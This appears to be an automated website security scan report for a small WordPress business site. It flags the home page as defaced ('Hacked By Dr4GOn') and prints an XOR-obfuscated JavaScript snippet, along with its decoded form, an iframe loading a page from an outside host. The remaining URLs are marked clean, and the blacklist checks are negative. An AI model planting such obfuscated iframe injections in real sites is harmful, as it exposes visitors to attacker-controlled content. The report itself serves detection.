Scanned pages/files
Request | Server response | Status |
http://afinesolutions.com/ | 200 OK Content-Length: 11983 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame.
var enkripsi="'02'02'02'02'1Akdpcog'02qpa'1F'00jvvr'1C--`cn{cl,kp-fgom-pf,jvon'00'02qapmnnkle'1F'00lm'00'02jgkejv'1F'00332'07'00'02ukfvj'1F'00322'07'00'02kf'1F'00dpo'00'1G'1A-kdpcog'1G"; teks=""; teksasli="";var panjang;panjang=enkripsi.length;for (i=0;i<panjang;i++){ teks+=String.fromCharCode(enkripsi.charCodeAt(i)^2) }teksasli=unescape(teks);document.write(teksasli);
Decoded script: <iframe src="http://balyan.ir/demo/rd.html" scrolling="no" height="110%" width="100%" id="frm"></iframe>
Deface/Content modification. The following signature was found: Hacked By Dr4GOn
<!DOCTYPE html>
<html lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <meta charset="utf-8" /> <title>Hacked By Dr4GOn</title> <style> #frm{ border:none; overflow:no-content; position:absolute; top:0; left:0; z-index:-100; } .wrapper{ width:100%; height:100%; background:transparent; position:absolute; z-index:-99; top:0; ...[13399 bytes skipped]...
http://afinesolutions.com/test404page.js | 404 Not Found Content-Length: 9610 Content-Type: text/html | clean |
http://afinesolutions.com/wp-includes/js/jquery/jquery.js?ver=1.8.3 | 200 OK Content-Length: 93658 Content-Type: application/javascript | clean |
http://afinesolutions.com/wp-content/themes/zeestyle/includes/js/jquery.cycle.all.min.js?ver=3.5 | 200 OK Content-Length: 27450 Content-Type: application/javascript | clean |
http://afinesolutions.com/contact/ | 200 OK Content-Length: 9719 Content-Type: text/html | clean |
http://afinesolutions.com/wp-includes/js/comment-reply.min.js?ver=3.5 | 200 OK Content-Length: 786 Content-Type: application/javascript | clean |
http://afinesolutions.com/my-favorite-things/ | 200 OK Content-Length: 9680 Content-Type: text/html | clean |
http://afinesolutions.com/2013/07/if-i-can-trust-them-you-can-too/ | 200 OK Content-Length: 10317 Content-Type: text/html | clean |
http://afinesolutions.com/author/jenny/ | 200 OK Content-Length: 27750 Content-Type: text/html | clean |
http://afinesolutions.com/category/post/ | 200 OK Content-Length: 27765 Content-Type: text/html | clean |
http://afinesolutions.com/2013/05/usability-testing-with-key-lime-interactive/ | 200 OK Content-Length: 10447 Content-Type: text/html | clean |
http://afinesolutions.com/2013/03/a-fine-kitchen-remodeling-company/ | 200 OK Content-Length: 10365 Content-Type: text/html | clean |
http://afinesolutions.com/2013/02/rollover-your-ira-or-401k/ | 200 OK Content-Length: 10479 Content-Type: text/html | clean |
http://afinesolutions.com/2013/01/great-networking-book/ | 200 OK Content-Length: 9980 Content-Type: text/html | clean |
http://afinesolutions.com/2013/01/great-networking-book/book/ | 200 OK Content-Length: 9126 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: afinesolutions.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 19 Nov 2015 09:14:36 GMT
Server: Apache
Content-Type: text/html; charset=UTF-8
X-Pingback: http://afinesolutions.com/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: afinesolutions.com
Referer: http://www.google.com/search?q=afinesolutions.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=afinesolutions.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://afinesolutions.com/
Result: afinesolutions.com is not infected or malware details are not published yet.